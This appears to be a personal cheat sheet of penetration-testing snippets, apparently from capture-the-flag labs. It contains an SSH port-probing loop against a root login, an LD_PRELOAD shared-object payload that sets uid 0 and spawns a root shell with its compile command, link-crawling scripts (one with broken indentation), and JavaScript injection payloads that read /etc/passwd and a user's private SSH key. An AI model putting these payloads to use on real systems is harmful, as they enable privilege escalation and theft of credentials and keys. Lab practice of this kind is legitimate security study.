#### script to test various ssh ports

#!/bin/bash

 

for port in {9000..13999}; do

  ssh -o ConnectTimeout=5 -p $port root@10.10.115.189 exit

  if [ $? -eq 0 ]; then

    echo "SSH connection successful on port $port"

    exit 0

  fi

done

echo "No open SSH port found"

exit 1

 

#### LD_PRELOAD

Shell.c:

#include <stdio.h>

#include <sys/types.h>

#include <unistd.h>

#include <stdlib.h>

void _init() {

unsetenv("LD_PRELOAD");

setgid(0);

setuid(0);

system("/bin/bash");

}

 

-         gcc -fPIC -shared -o shell.so shell.c -nostartfiles

-         if you get errors include the following: #include <unistd.h>

 

#### script to scrape info from results.txt

import requests

from bs4 import BeautifulSoup

 

def scrape_links(url):

    # Send a GET request to the page

    response = requests.get(url)

    # Parse the HTML content

    soup = BeautifulSoup(response.text, 'html.parser')

    # Find all <a> tags

    links = soup.find_all('a')

    return links

 

def main():

    # Open the results file

    with open("results.txt", "r") as file:

        # Read each line of the file

        for line in file:

            links = scrape_links(line.strip())

            # Iterate over the links

            for link in links:

                # Print the link's href attribute

                print(link.get('href'))

 

if __name__ == "__main__":

    main()

 

#### Same as above but from HTB:

#!/usr/bin/python

import sys

import json

import requests

import argparse

from bs4 import BeautifulSoup

 

def results(file):

                content=open(file,'r').readlines()

                for line in content:

                                data=json.loads(line.strip())

                urls=[]

                for url in data['results']:

                                urls.append(url['url'])

                return urls

def crawl(url):

                r = requests.get(url)

                soup = BeautifulSoup(r.text,'lxml')

                links = soup.findAll('a',href=True)

                for link in links:

                                link=link['href']

                                if link and link!='#':

                                print '[+] {} : {}'.format(url,link)

if __name__=="__main__":

                parser = argparse.ArgumentParser()

                parser.add_argument("file",help="ffuf results")

                args = parser.parse_args()

                urls=results(args.file)

                for url in urls:

                                crawl(url)

 

#### Script

use this script, if you want to extract info (as in exported) so you have  system which you can enter this and then export it to get what you need.                                                                                  

 

<script>

var x = new XMLHttpRequest();

x.open("GET", "file:///etc/passwd", true);

x.onload = function(){

document.write(x.responseText);

};

x.send();

</script>

 

##### As above but to get the base64 encoded SSH key

<script>

var x = new XMLHttpRequest();

x.open("GET", "file:///home/reader/.ssh/id_rsa", true);

x.onload = function(){

var code = "<textarea rows='100' cols='70'>" + btoa(x.responseText) + "

</textarea>";

document.write(code);

};

x.send();

</script>